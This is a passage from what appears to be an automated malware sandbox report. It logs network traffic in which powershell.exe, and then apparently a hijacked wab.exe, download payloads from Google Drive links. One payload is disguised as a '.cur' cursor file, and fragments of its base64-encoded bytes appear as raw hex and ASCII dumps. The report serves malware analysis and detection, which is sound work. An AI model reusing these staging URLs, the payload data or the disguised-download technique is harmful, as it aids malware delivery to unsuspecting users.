                                        Apr 24, 2024 07:05:10.747216940 CEST1289INData Raw: 20 20 20 20 20 20 20 76 61 72 20 64 6f 6d 61 69 6e 5f 61 72 72 61 79 20 3d 20 64 6f 6d 61 69 6e 2e 73 70 6c 69 74 28 22 2e 22 29 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 6f 75 74 20 3d 20 5b 5d 3b 0a 20 20 20 20 20 20 20 20 66 6f 72 20 28 76 61
                                        Data Ascii: var domain_array = domain.split("."); var out = []; for (var i=0; i < domain_array.length; ++i) { var s = domain_array[i]; out.push( s.match(/[^A-Za-z0-9-]/) ? "xn-
                                        Apr 24, 2024 07:05:10.747277021 CEST1289INData Raw: 61 70 70 65 72 20 7b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 31 30 32 34 70 78 3b 0a 09 09 09 64 69 73 70 6c 61 79 3a 20 66 6c 65 78
                                        Data Ascii: apper {padding: 0px;margin: 0 auto;max-width: 1024px;display: flex;flex-direction: column;justify-content: space-between; flex: 1 0 auto; } .logo { padding: 30px 40px; }
                                        Apr 24, 2024 07:05:10.747963905 CEST1289INData Raw: 20 2e 66 6f 6f 74 65 72 2d 6c 69 6e 6b 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 67 72 69 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 67 72 69 64 2d 61 72 65 61 3a 20 6c 69 6e 6b 73 3b 0a 20 20 20 20 20 20 20 20
                                        Data Ascii: .footer-links { display: grid; grid-area: links; grid-template-columns: repeat(2, 1fr); grid-column-gap: 80px; grid-row-gap: 10px; font-size: 13px; } .fo
                                        Apr 24, 2024 07:05:10.747980118 CEST1289INData Raw: 34 46 37 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 46 33 46 34 46 37 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20
                                        Data Ascii: 4F7; border-bottom: 1px solid #F3F4F7; } } </style></head><body><header> <div class="logo"> <a href="https://www.nic.ru/"> <svg width="100" height="42" viewBox="0 0
                                        Apr 24, 2024 07:05:11.091476917 CEST1289INData Raw: 36 33 34 43 34 30 2e 36 37 31 34 20 32 30 2e 38 38 35 37 20 34 30 2e 30 32 34 37 20 32 30 2e 39 34 37 35 20 33 39 2e 32 33 31 32 20 32 30 2e 39 34 37 35 5a 22 20 66 69 6c 6c 3d 22 23 31 34 32 39 35 45 22 3e 3c 2f 70 61 74 68 3e 0a 20 20 20 20 20
                                        Data Ascii: 634C40.6714 20.8857 40.0247 20.9475 39.2312 20.9475Z" fill="#14295E"></path> <path d="M53.1509 14.1788C53.1695 14.0678 53.1828 13.9659 53.1923 13.8744C53.2017 13.7815 53.2065 13.6867 53.2065 13.5876C53.2065 13.1011 53.0556


                                        HTTPS Proxied Packets

                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.949706142.250.101.1004437500C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        TimestampBytes transferredDirectionData
                                        2024-04-24 05:03:03 UTC215OUTGET /uc?export=download&id=13sIDgKu2D7iI6zRxA4gGYSas5i0mhATB HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                        Host: drive.google.com
                                        Connection: Keep-Alive
                                        2024-04-24 05:03:04 UTC1582INHTTP/1.1 303 See Other
                                        Content-Type: application/binary
                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                        Pragma: no-cache
                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                        Date: Wed, 24 Apr 2024 05:03:04 GMT
                                        Location: https://drive.usercontent.google.com/download?id=13sIDgKu2D7iI6zRxA4gGYSas5i0mhATB&export=download
                                        Strict-Transport-Security: max-age=31536000
                                        Content-Security-Policy: script-src 'nonce-xsu5KcnI8CFhGYtNXm4ACg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                        Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                        Cross-Origin-Opener-Policy: same-origin
                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                        Server: ESF
                                        Content-Length: 0
                                        X-XSS-Protection: 0
                                        X-Frame-Options: SAMEORIGIN
                                        X-Content-Type-Options: nosniff
                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                        Connection: close


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        1192.168.2.949707142.251.2.1324437500C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        TimestampBytes transferredDirectionData
                                        2024-04-24 05:03:04 UTC233OUTGET /download?id=13sIDgKu2D7iI6zRxA4gGYSas5i0mhATB&export=download HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                        Host: drive.usercontent.google.com
                                        Connection: Keep-Alive
                                        2024-04-24 05:03:06 UTC4746INHTTP/1.1 200 OK
                                        X-GUploader-UploadID: ABPtcPq0DQiulHKwAkJlvp_f1VZ4ysFLddOLgTpTfsjLUoun8euZIwW5gvVVdVFIgCeHud4-6OM
                                        Content-Type: application/octet-stream
                                        Content-Security-Policy: sandbox
                                        Content-Security-Policy: default-src 'none'
                                        Content-Security-Policy: frame-ancestors 'none'
                                        X-Content-Security-Policy: sandbox
                                        Cross-Origin-Opener-Policy: same-origin
                                        Cross-Origin-Embedder-Policy: require-corp
                                        Cross-Origin-Resource-Policy: same-site
                                        X-Content-Type-Options: nosniff
                                        Content-Disposition: attachment; filename="Senatorian.cur"
                                        Access-Control-Allow-Origin: *
                                        Access-Control-Allow-Credentials: false
                                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Goog-Maps-Ios-Uuid, X-Goog-Maps-Android-Uuid, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Desusertion, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context, x-goog-nest-jwt
                                        Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                        Accept-Ranges: bytes
                                        Content-Length: 477016
                                        Last-Modified: Mon, 22 Apr 2024 15:58:30 GMT
                                        Date: Wed, 24 Apr 2024 05:03:05 GMT
                                        Expires: Wed, 24 Apr 2024 05:03:05 GMT
                                        Cache-Control: private, max-age=0
                                        X-Goog-Hash: crc32c=Iw/GxA==
                                        Server: UploadServer
                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                        Connection: close
                                        2024-04-24 05:03:06 UTC4746INData Raw: 36 77 4b 4a 6a 4f 73 43 31 4c 4f 37 33 37 6b 4d 41 48 45 42 6d 2b 73 43 2b 41 73 44 58 43 51 45 63 51 47 62 36 77 4c 34 5a 4c 6e 4a 73 71 59 49 36 77 4c 76 46 58 45 42 6d 34 48 70 50 70 61 43 4b 65 73 43 6a 6e 58 72 41 6b 64 49 67 63 46 31 34 39 73 67 36 77 4b 30 56 75 73 43 49 34 66 72 41 69 6c 54 36 77 4a 59 36 72 70 74 77 53 6c 33 36 77 4a 37 48 2b 73 43 58 78 33 72 41 73 56 35 63 51 47 62 4d 63 70 78 41 5a 74 78 41 5a 75 4a 46 41 74 78 41 5a 74 78 41 5a 76 52 34 6e 45 42 6d 2b 73 43 35 48 61 44 77 51 54 72 41 75 58 72 36 77 4a 51 58 6f 48 35 34 58 69 49 42 58 7a 4d 63 51 47 62 63 51 47 62 69 30 51 6b 42 4f 73 43 78 4b 39 78 41 5a 75 4a 77 2b 73 43 65 46 44 72 41 68 35 56 67 63 4f 53 6d 54 4d 41 63 51 47 62 36 77 4c 65 4a 37 71 65 4d 4f 44 48 36 77 4c
                                        Data Ascii: 6wKJjOsC1LO737kMAHEBm+sC+AsDXCQEcQGb6wL4ZLnJsqYI6wLvFXEBm4HpPpaCKesCjnXrAkdIgcF149sg6wK0VusCI4frAilT6wJY6rptwSl36wJ7H+sCXx3rAsV5cQGbMcpxAZtxAZuJFAtxAZtxAZvR4nEBm+sC5HaDwQTrAuXr6wJQXoH54XiIBXzMcQGbcQGbi0QkBOsCxK9xAZuJw+sCeFDrAh5VgcOSmTMAcQGb6wLeJ7qeMODH6wL
                                        2024-04-24 05:03:06 UTC4746INData Raw: 65 58 4c 79 43 68 78 74 6e 56 59 35 64 53 55 4b 73 75 6e 59 38 73 35 33 39 62 76 74 49 52 5a 54 45 50 74 43 48 4f 6e 53 4b 41 31 37 74 58 49 6c 37 6c 42 63 78 79 63 56 74 58 5a 68 4f 49 49 66 67 71 36 74 51 36 71 44 75 44 76 55 44 6b 64 61 43 6e 7a 49 67 6c 76 48 4f 39 7a 6c 73 73 64 44 2f 61 31 6f 6d 6b 45 70 6f 49 39 46 46 69 41 66 75 57 55 6c 44 37 6c 6c 4a 51 2b 35 5a 53 55 50 75 57 55 6c 44 37 6c 6c 4a 51 37 4b 37 71 6a 58 7a 5a 2b 33 47 66 51 41 73 67 6f 56 6a 73 4b 67 69 5a 6c 57 4c 37 6c 6c 4a 51 2b 35 5a 53 55 50 75 57 55 6c 44 37 6c 6c 4a 51 2b 35 5a 53 55 4f 64 49 58 6f 32 54 72 38 75 34 31 57 42 61 41 45 4f 47 68 4d 2b 2b 6f 34 74 69 73 4b 5a 6e 6d 30 5a 43 4a 39 6e 4c 75 4f 50 75 4f 2b 76 36 62 56 4a 6f 70 42 6a 71 38 31 38 78 36 49 72 52 34
                                        Data Ascii: eXLyChxtnVY5dSUKsunY8s539bvtIRZTEPtCHOnSKA17tXIl7lBcxycVtXZhOIIfgq6tQ6qDuDvUDkdaCnzIglvHO9zlssdD/a1omkEpoI9FFiAfuWUlD7llJQ+5ZSUPuWUlD7llJQ7K7qjXzZ+3GfQAsgoVjsKgiZlWL7llJQ+5ZSUPuWUlD7llJQ+5ZSUOdIXo2Tr8u41WBaAEOGhM++o4tisKZnm0ZCJ9nLuOPuO+v6bVJopBjq818x6IrR4
                                        2024-04-24 05:03:06 UTC463INData Raw: 42 65 46 79 58 4a 42 36 44 38 68 76 63 67 66 42 38 6f 4b 36 58 6a 7a 35 76 73 6d 4e 32 75 6f 6f 57 5a 7a 6c 66 47 34 4a 2b 53 34 73 73 72 30 54 55 4a 2b 47 42 4c 4a 75 46 38 31 68 32 5a 4a 64 6f 38 59 6f 4a 66 74 33 31 72 79 6a 38 47 75 42 6f 52 64 6d 64 4b 6f 4b 50 77 33 30 55 57 76 65 2b 35 5a 53 55 50 75 57 55 6c 44 37 6c 6c 4a 51 2b 35 5a 53 55 50 75 57 55 6c 44 5a 41 4c 34 78 45 42 64 6d 64 4c 4c 71 30 42 54 30 6c 6b 5a 30 2b 35 5a 53 55 50 75 57 55 6c 44 37 6c 6c 4a 51 2b 35 5a 53 55 50 75 57 55 6c 44 7a 58 52 5a 5a 7a 39 79 44 36 35 41 41 2b 61 4f 77 65 67 53 71 52 65 36 44 4e 76 68 4b 50 63 69 35 57 36 39 42 53 49 38 6b 41 30 42 5a 6e 73 4a 66 46 36 45 6f 79 47 74 74 30 54 6a 66 55 38 43 66 78 38 37 5a 47 70 39 4c 7a 5a 32 76 71 53 4c 6f 58 6e 36
                                        Data Ascii: BeFyXJB6D8hvcgfB8oK6Xjz5vsmN2uooWZzlfG4J+S4ssr0TUJ+GBLJuF81h2ZJdo8YoJft31ryj8GuBoRdmdKoKPw30UWve+5ZSUPuWUlD7llJQ+5ZSUPuWUlDZAL4xEBdmdLLq0BT0lkZ0+5ZSUPuWUlD7llJQ+5ZSUPuWUlDzXRZZz9yD65AA+aOwegSqRe6DNvhKPci5W69BSI8kA0BZnsJfF6EoyGtt0TjfU8Cfx87ZGp9LzZ2vqSLoXn6
                                        2024-04-24 05:03:06 UTC1255INData Raw: 39 43 4f 64 65 71 76 47 4d 41 4a 37 73 72 55 4c 50 6b 45 6c 64 57 67 47 65 58 47 5a 4b 63 70 36 31 68 6c 78 78 54 30 50 52 58 77 74 36 74 46 63 6c 76 64 69 37 4f 2b 6c 53 51 74 48 50 73 70 46 78 2b 42 50 54 5a 4e 38 7a 67 58 75 74 46 32 5a 30 5a 72 72 56 36 2f 53 51 4b 42 6a 37 6c 6c 4a 51 2b 35 5a 53 55 50 75 57 55 6c 44 37 6c 6c 4a 51 2b 35 5a 53 55 4f 47 62 44 4d 58 51 51 77 59 49 37 62 79 69 38 79 72 2b 76 43 56 4e 45 67 48 72 74 37 6d 6b 2b 48 70 6c 64 68 39 56 74 64 4f 6a 30 48 77 4b 32 33 4b 4e 51 68 6b 6e 51 6e 78 6d 33 71 4d 35 51 56 79 62 4e 71 51 2b 6c 6e 35 4f 4c 43 38 6c 4a 74 6b 54 56 53 44 53 7a 64 4e 6b 33 7a 4a 2f 76 38 30 58 5a 6e 52 71 72 4a 59 6d 65 70 4a 32 45 57 62 30 61 51 42 44 6d 6d 6c 43 61 4a 4d 62 33 70 66 79 5a 37 32 78 52 79
                                        Data Ascii: 9COdeqvGMAJ7srULPkEldWgGeXGZKcp61hlxxT0PRXwt6tFclvdi7O+lSQtHPspFx+BPTZN8zgXutF2Z0ZrrV6/SQKBj7llJQ+5ZSUPuWUlD7llJQ+5ZSUOGbDMXQQwYI7byi8yr+vCVNEgHrt7mk+Hpldh9VtdOj0HwK23KNQhknQnxm3qM5QVybNqQ+ln5OLC8lJtkTVSDSzdNk3zJ/v80XZnRqrJYmepJ2EWb0aQBDmmlCaJMb3pfyZ72xRy
                                        2024-04-24 05:03:06 UTC65INData Raw: 75 57 55 6c 44 37 6c 6c 4a 51 2b 35 5a 42 6f 4a 52 57 5a 78 6e 70 2b 53 65 67 51 55 69 6e 2f 74 46 76 46 63 73 44 62 4b 33 6c 75 35 64 53 55 42 50 70 68 6c 54 37 48 52 56 63 63 68 4d 69 55 66 75
                                        Data Ascii: uWUlD7llJQ+5ZBoJRWZxnp+SegQUin/tFvFcsDbK3lu5dSUBPphlT7HRVcchMiUfu
                                        2024-04-24 05:03:06 UTC1255INData Raw: 57 32 52 57 2f 6d 5a 56 69 47 5a 5a 53 55 50 75 57 55 6c 44 37 6c 6c 4a 51 2b 35 5a 53 55 50 75 57 55 6c 44 37 6e 73 75 56 39 70 67 59 6d 6c 67 79 4c 65 45 4f 32 72 55 2f 79 35 45 70 73 59 6b 6c 37 73 63 6c 78 6f 6c 46 6c 2b 2b 31 6b 4b 6b 73 32 68 55 4f 72 39 4f 69 65 69 49 53 50 33 70 6b 71 4d 54 34 41 64 4f 69 43 50 4c 6b 6b 61 30 4b 32 37 62 36 67 4d 38 32 77 6d 41 6e 52 43 2f 4f 67 6e 63 64 4b 57 64 59 49 39 48 4f 33 50 67 2b 52 4f 36 55 31 71 76 6e 30 76 4e 7a 30 4b 35 49 37 33 31 37 61 53 34 4f 77 6c 55 49 45 4b 73 75 62 32 53 76 6b 57 63 34 69 39 41 47 5a 61 76 79 62 38 7a 57 6b 30 31 2f 4e 4d 58 4f 32 52 69 58 55 63 32 64 72 36 67 67 33 68 4b 36 53 75 49 66 43 72 62 66 70 70 49 4f 30 59 47 6b 79 7a 41 43 58 42 6e 4d 6c 7a 42 48 44 69 73 78 79 73
                                        Data Ascii: W2RW/mZViGZZSUPuWUlD7llJQ+5ZSUPuWUlD7nsuV9pgYmlgyLeEO2rU/y5EpsYkl7sclxolFl++1kKks2hUOr9OieiISP3pkqMT4AdOiCPLkka0K27b6gM82wmAnRC/OgncdKWdYI9HO3Pg+RO6U1qvn0vNz0K5I7317aS4OwlUIEKsub2SvkWc4i9AGZavyb8zWk01/NMXO2RiXUc2dr6gg3hK6SuIfCrbfppIO0YGkyzACXBnMlzBHDisxys
                                        2024-04-24 05:03:06 UTC1255INData Raw: 44 55 71 69 2b 65 63 75 46 64 30 36 47 6b 6f 66 2f 55 65 6d 64 76 30 4b 47 30 30 35 47 55 5a 45 44 43 63 71 39 6b 63 6a 4b 47 77 6b 74 57 70 6a 31 6c 70 6f 62 38 76 42 61 4c 49 6e 33 4e 4c 34 38 37 39 53 4c 2b 52 34 2f 42 56 45 33 71 68 50 75 68 66 48 49 4d 48 79 58 4b 47 4e 68 78 57 71 49 75 36 73 2f 54 70 6f 72 35 35 70 6c 36 59 4a 59 6c 71 6c 4d 46 37 79 6c 4a 71 72 39 36 59 61 63 75 65 7a 33 54 70 31 65 50 6d 44 68 36 65 63 33 53 53 62 72 62 5a 30 54 52 6a 62 75 50 6c 4b 58 42 4e 72 2f 32 52 4a 64 31 43 72 2b 44 6d 35 2b 35 4c 33 70 43 44 79 54 49 42 5a 76 75 74 31 62 34 31 79 6c 78 6d 7a 5a 30 6c 64 65 75 68 46 79 45 78 63 6e 54 70 6f 66 63 6c 64 69 74 48 65 63 69 2b 5a 5a 53 41 45 4d 47 39 6f 4a 69 75 78 30 2b 45 45 31 6e 56 32 4b 67 39 48 32 39 4f
                                        Data Ascii: DUqi+ecuFd06Gkof/Uemdv0KG005GUZEDCcq9kcjKGwktWpj1lpob8vBaLIn3NL4879SL+R4/BVE3qhPuhfHIMHyXKGNhxWqIu6s/Tpor55pl6YJYlqlMF7ylJqr96Yacuez3Tp1ePmDh6ec3SSbrbZ0TRjbuPlKXBNr/2RJd1Cr+Dm5+5L3pCDyTIBZvut1b41ylxmzZ0ldeuhFyExcnTpofclditHeci+ZZSAEMG9oJiux0+EE1nV2Kg9H29O
                                        2024-04-24 05:03:06 UTC1255INData Raw: 6b 77 76 59 31 4b 78 33 6d 7a 65 4e 56 4a 48 70 55 65 47 73 6c 4c 66 4b 6f 73 5a 37 39 6b 65 48 66 31 6f 72 76 64 2f 58 75 6e 6d 41 6e 7a 59 71 58 79 42 50 32 58 78 4a 59 45 72 71 78 33 58 69 66 71 57 55 70 79 34 4c 62 51 74 42 6f 32 6a 6a 42 6f 6f 57 76 51 4b 63 76 6f 37 54 77 44 2f 75 69 35 54 71 6b 64 6e 66 47 64 44 48 33 6e 55 4b 63 35 50 6b 43 6f 35 2f 68 43 34 76 6a 35 57 55 4b 73 75 30 36 69 75 53 47 63 47 44 6b 51 64 56 55 45 49 2b 78 76 57 49 54 39 6f 54 72 73 47 4e 77 79 78 32 32 6a 64 51 38 39 61 54 79 49 46 30 77 54 42 59 6c 44 47 73 7a 55 6b 6b 34 50 50 37 50 54 6f 58 30 6d 59 76 51 52 76 32 34 32 50 35 65 4a 53 61 6c 68 6f 63 37 51 35 51 7a 36 4e 6b 6d 4a 6b 72 78 75 6a 48 64 2f 55 2b 35 5a 53 36 75 57 4c 43 43 6f 54 77 63 56 55 2b 31 72 2f
                                        Data Ascii: kwvY1Kx3mzeNVJHpUeGslLfKosZ79keHf1orvd/XunmAnzYqXyBP2XxJYErqx3XifqWUpy4LbQtBo2jjBooWvQKcvo7TwD/ui5TqkdnfGdDH3nUKc5PkCo5/hC4vj5WUKsu06iuSGcGDkQdVUEI+xvWIT9oTrsGNwyx22jdQ89aTyIF0wTBYlDGszUkk4PP7PToX0mYvQRv242P5eJSalhoc7Q5Qz6NkmJkrxujHd/U+5ZS6uWLCCoTwcVU+1r/
                                        2024-04-24 05:03:06 UTC1255INData Raw: 4c 37 70 50 31 57 7a 54 6f 56 4c 79 46 6f 64 36 5a 7a 50 35 31 75 4f 65 6f 66 5a 73 30 55 68 63 52 77 67 5a 49 55 58 49 4e 77 6b 74 4b 31 58 4e 4c 33 38 54 2b 50 56 45 78 6e 73 4c 59 34 2f 69 71 48 64 65 59 70 45 73 47 47 4f 69 44 64 45 53 74 6f 41 58 6f 38 63 44 36 52 51 4e 45 51 78 36 5a 2f 46 51 72 52 7a 54 6f 57 69 6f 52 34 5a 79 68 31 53 74 4c 32 43 51 72 6a 67 65 56 43 62 53 55 42 75 77 4c 34 41 69 74 68 66 41 6f 75 44 31 49 6d 6e 5a 72 69 37 45 62 61 4f 39 68 35 5a 6d 47 62 4d 62 47 44 71 59 69 47 48 55 2f 77 59 31 7a 39 6e 64 75 70 52 53 55 50 53 58 6f 5a 2f 37 6c 6c 4a 51 2b 35 5a 53 55 50 75 57 55 6c 44 37 6c 6c 4a 51 2b 35 5a 53 55 4f 55 73 56 52 2b 6e 6e 31 74 39 43 2f 35 5a 2f 55 77 7a 6e 6a 31 63 37 70 72 2b 70 65 64 38 7a 32 50 35 44 43 37
                                        Data Ascii: L7pP1WzToVLyFod6ZzP51uOeofZs0UhcRwgZIUXINwktK1XNL38T+PVExnsLY4/iqHdeYpEsGGOiDdEStoAXo8cD6RQNEQx6Z/FQrRzToWioR4Zyh1StL2CQrjgeVCbSUBuwL4AithfAouD1ImnZri7EbaO9h5ZmGbMbGDqYiGHU/wY1z9ndupRSUPSXoZ/7llJQ+5ZSUPuWUlD7llJQ+5ZSUOUsVR+nn1t9C/5Z/Uwznj1c7pr+ped8z2P5DC7
                                        2024-04-24 05:03:06 UTC1255INData Raw: 6f 61 43 41 6a 52 6f 52 32 70 75 49 64 32 75 68 4f 31 4d 4d 38 6d 4d 58 4e 59 78 4c 2b 70 42 4b 51 43 6e 72 72 4c 6d 6b 64 6c 6c 4a 66 64 4e 45 2f 55 50 76 49 75 74 31 72 6b 6c 49 41 51 35 38 43 58 45 69 6a 59 78 36 67 61 6d 64 59 4a 66 2b 58 56 53 76 57 6b 79 57 73 43 74 75 33 2b 70 48 50 4e 6e 35 41 49 55 4e 33 2f 32 50 2b 4d 33 7a 6d 67 68 6d 30 71 79 70 66 68 73 51 46 44 41 2f 4f 52 70 4a 46 53 65 67 46 4a 69 4b 76 57 70 39 42 73 59 46 62 30 79 32 50 36 54 74 51 2b 35 6e 66 74 6e 32 57 55 67 39 2b 56 77 6f 34 57 52 49 41 67 66 53 52 50 6e 6e 37 6c 6c 4a 51 2b 35 5a 53 55 50 75 57 55 6c 44 37 6c 6c 4a 51 2b 35 5a 53 55 4f 54 6c 4f 63 47 4c 77 46 55 41 65 71 4a 32 56 73 30 62 4a 39 48 50 73 6d 37 36 70 54 32 65 74 4c 76 2b 33 50 44 54 45 7a 77 52 44 34
                                        Data Ascii: oaCAjRoR2puId2uhO1MM8mMXNYxL+pBKQCnrrLmkdllJfdNE/UPvIut1rklIAQ58CXEijYx6gamdYJf+XVSvWkyWsCtu3+pHPNn5AIUN3/2P+M3zmghm0qypfhsQFDA/ORpJFSegFJiKvWp9BsYFb0y2P6TtQ+5nftn2WUg9+Vwo4WRIAgfSRPnn7llJQ+5ZSUPuWUlD7llJQ+5ZSUOTlOcGLwFUAeqJ2Vs0bJ9HPsm76pT2etLv+3PDTEzwRD4


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        2192.168.2.949712142.250.101.1004436908C:\Program Files (x86)\Windows Mail\wab.exe
                                        TimestampBytes transferredDirectionData
                                        2024-04-24 05:03:58 UTC216OUTGET /uc?export=download&id=1-KQmxodyjhhw6fN77qkVCo3Tox2hzzLI HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                        Host: drive.google.com
                                        Cache-Control: no-cache
                                        2024-04-24 05:03:58 UTC1582INHTTP/1.1 303 See Other
                                        Content-Type: application/binary
                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                        Pragma: no-cache
                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                        Date: Wed, 24 Apr 2024 05:03:58 GMT
                                        Location: https://drive.usercontent.google.com/download?id=1-KQmxodyjhhw6fN77qkVCo3Tox2hzzLI&export=download
                                        Strict-Transport-Security: max-age=31536000
                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                        Content-Security-Policy: script-src 'nonce-DzRehfSY8kMwjD8YC83zQQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                        Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                        Cross-Origin-Opener-Policy: same-origin
                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                        Server: ESF
                                        Content-Length: 0
                                        X-XSS-Protection: 0
                                        X-Frame-Options: SAMEORIGIN
                                        X-Content-Type-Options: nosniff
